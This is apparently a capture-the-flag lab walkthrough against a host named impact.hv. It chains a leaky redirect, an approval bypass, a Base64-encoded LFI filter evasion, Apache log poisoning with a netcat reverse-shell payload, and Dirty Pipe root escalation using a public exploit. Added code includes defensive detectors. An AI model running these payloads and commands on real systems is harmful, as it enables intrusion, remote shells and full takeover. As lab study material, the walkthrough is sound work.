Port Scanning

22/tcp open  ssh
80/tcp open  http

Fuzzing

/index.php - 302
/login.php - 200
/logout.php - 302
/register.php

/uploads/
/webadmin/

/webadmin/components/
/webadmin/assets/
/webadmin/tables/

I tested the login form for SQL injection and ran a dictionary attack against it; neither produced anything.

"I created an account and found the first answer, but I'm stuck again."

While checking the Burp history, I noticed that /webadmin/index.php answers with a redirect, but the 302 response still carries the full page body, so the content is leaked to anyone who reads the response instead of following the redirect. This gave me the second answer and a new endpoint: tables/datatables.php.

I went back to my account's payment section, whose status was 'Pending Admin Approval', and then requested: GET /webadmin/tables/datatables.php

There, I found a hidden form:

<form action="/../../sendFile.php" method="post">
  <input type="hidden" name="username" value="orion">
  <button type="submit" class="btn btn-success">Confirm</button>
</form>

I manually executed the request using curl:

curl -X POST -d "username=orion" http://impact.hv/sendFile.php

After that, I checked my account again: the payment had been approved. The approval endpoint acts on a client-supplied username and could be triggered from an ordinary account, so the admin step is skipped entirely. The profile page is now accessible at http://impact.hv/profile.php.

"When clicking any of the buttons, the following request is generated:

http://impact.hv/search.php?name=dmVydGV4dGVjaG5vbG9naWVzLnNxbA

The parameter is Base64 encoded. I started testing for LFI (Local File Inclusion), but it was challenging. My initial Base64 encoded payloads didn't work, suggesting a filter was in place. To bypass it, I tried using ....// instead of the standard ../"

....//....//....//....//....//....//....//var/log/apache2/access.log
# Base64
Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c=
GET /search.php?name= HTTP/1.1

The bypass worked. I attempted to access the access.log file, but due to its large size, the server could not handle the request. To resolve this, I had to reload the lab machine."
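The bypass above works because of how a naive filter treats "....//": if the server deletes "../" once and does not repeat the pass, the inner "../" is removed and the leftover dots and slash close up into exactly "../". The Python below is an added example, not code from the lab or from this writeup. It models that assumed once-only strip (the real filter on impact.hv is not shown on the page), reproduces the exact Base64 payload used above, shows what a naive include would open, and contrasts it with a resolver that confines the decoded path to a fixed directory. The WEBROOT and SAFE_ROOT paths are assumptions.

```python
import base64
import posixpath

WEBROOT = "/var/www/html"            # assumed include base of the vulnerable version
SAFE_ROOT = "/var/www/html/files"    # assumed allowed directory of the hardened version


def decode_name_param(value):
    """Decode search.php's name= value the way PHP's base64_decode does:
    tolerate missing padding (the legitimate value on this page has none)."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded, validate=True).decode()


def encode_name_param(path):
    return base64.b64encode(path.encode()).decode()


def naive_strip_traversal(path):
    """Assumed filter of the kind ....// defeats: remove '../' once, not
    recursively. '....//' becomes '../' because the inner '../' is deleted and
    the surrounding dots and slash close up around the hole."""
    return path.replace("../", "")


def build_lfi_payload(target, depth=7, sep="....//"):
    """Build the name= value for an LFI attempt against the naive filter."""
    return encode_name_param(sep * depth + target.lstrip("/"))


def resolve_vulnerable(name_param, webroot=WEBROOT):
    """Path a naive include would open: decode, filter once, join, normalise."""
    filtered = naive_strip_traversal(decode_name_param(name_param))
    return posixpath.normpath(posixpath.join(webroot, filtered))


def resolve_hardened(name_param, root=SAFE_ROOT):
    """Decode, normalise, then refuse anything outside root (None = rejected).
    A real deployment should additionally realpath() the result to defeat
    symlinks, and prefer an allowlist of filenames over path arithmetic."""
    try:
        decoded = decode_name_param(name_param)
    except (ValueError, UnicodeDecodeError):
        return None
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    payload = build_lfi_payload("/var/log/apache2/access.log")
    print("name=" + payload)
    print("vulnerable include opens:", resolve_vulnerable(payload))
    print("hardened include opens:  ", resolve_hardened(payload))
```

Against the hardened resolver the "....//" trick is harmless: with no strip pass, "...." is just a directory name that does not exist, and the normalised path never leaves SAFE_ROOT. A plain "../" payload is rejected outright.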

I poisoned the Apache access log by sending a PHP payload in the User-Agent header (IP and PORT are the listener's address; the request path does not matter, it only has to be logged):

curl -A "<?php system('nc -e /bin/sh IP PORT'); ?>" http://impact.hv/curl 

Then I started a listener on PORT and requested the poisoned log through the LFI, which executes the injected PHP:

GET /search.php?name=Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c= HTTP/1.1
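From the defender's side, both halves of this chain land in the same access.log that gets included: the PHP tag in the User-Agent and the traversal hidden behind Base64 in the name= parameter. The Python below is an added detection example, not part of the writeup; the three sample log lines are constructed (IPs and timestamps invented), but the request and User-Agent values are the ones used above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.{2,}[/\\]')       # matches ../ and the ....// variant
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Constructed sample lines; payload values are the ones from this page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:00:01 +0000] "GET /search.php?name=dmVydGV4dGVjaG5vbG9naWVzLnNxbA HTTP/1.1" 200 1532 "http://impact.hv/profile.php" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:10:02:14 +0000] "GET /curl HTTP/1.1" 404 437 "-" "<?php system('nc -e /bin/sh IP PORT'); ?>"
10.0.0.9 - - [10/Mar/2024:10:02:31 +0000] "GET /search.php?name=Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c= HTTP/1.1" 200 88213 "-" "curl/7.88.1"
"""


def b64_lenient(value):
    """Decode like PHP's base64_decode (missing padding tolerated); None if not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyze_line(line):
    """Return (rule, client_ip, detail) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = parse_qs(urlsplit(m["target"]).query)
    for raw in query.get("name", []):          # the LFI parameter on this page
        decoded = b64_lenient(raw)
        if decoded is not None and TRAVERSAL_RE.search(decoded):
            findings.append(("lfi_traversal", m["ip"], decoded))
    if PHP_TAG_RE.search(m["ua"]):              # log-poisoning attempt
        findings.append(("log_poisoning_ua", m["ip"], m["ua"]))
    return findings


def scan_log(text):
    return [f for line in text.splitlines() if line.strip() for f in analyze_line(line)]


if __name__ == "__main__":
    for rule, ip, detail in scan_log(SAMPLE_LOG):
        print(f"{rule:18} {ip:12} {detail}")
```

The decode step matters: a signature on the raw URL would never see "../" because it only exists after Base64 decoding, and the lenient padding mirrors PHP so a legitimate unpadded value like the one on the profile page still parses and is correctly left alone.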

The answer is in:

cat /home/impact/targets.txt

Privilege Escalation: CVE-2022-0847 (Dirty Pipe)

I used this CVE to get root. The exploit can be downloaded with:

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh                 # builds exploit-1 and exploit-2

# First way: patch /etc/passwd through the page cache and drop a root shell
./exploit-1

# Second way: hijack a SUID binary
./exploit-2 /usr/bin/passwd
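Before compiling the exploit it is worth checking that the kernel is actually in the affected range. The Python below is an added example, not part of the writeup or of the exploit repository; the boundaries are the upstream fix points for CVE-2022-0847 (affected from 5.8, fixed in 5.16.11, 5.15.25 and 5.10.102, with 5.17 unaffected). Distribution kernels that backport the fix keep their upstream version string, so a positive result means "worth trying", not "confirmed vulnerable".

```python
import re

# Upstream version boundaries for CVE-2022-0847 (Dirty Pipe).
FIRST_AFFECTED = (5, 8, 0)
FIRST_UNAFFECTED_SERIES = (5, 17)
FIXED_IN_STABLE = {
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}


def parse_release(release):
    """Turn a `uname -r` string such as '5.13.0-30-generic' into (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def dirty_pipe_candidate(release):
    """True when the upstream version falls inside the affected range.
    Series between 5.8 and 5.16 with no listed stable fix (5.9, 5.11-5.14)
    were end-of-life before the fix and are treated as affected."""
    v = parse_release(release)
    if v < FIRST_AFFECTED or v[:2] >= FIRST_UNAFFECTED_SERIES:
        return False
    fix = FIXED_IN_STABLE.get(v[:2])
    return fix is None or v < fix


if __name__ == "__main__":
    import platform
    rel = platform.release()   # same string as `uname -r` on Linux
    verdict = "candidate, try the exploit" if dirty_pipe_candidate(rel) else "outside the affected range"
    print(f"{rel}: {verdict}")
```

Run it on the target with the same Python that is already installed there; if the box has no Python, feed the output of `uname -r` to parse_release from anywhere else.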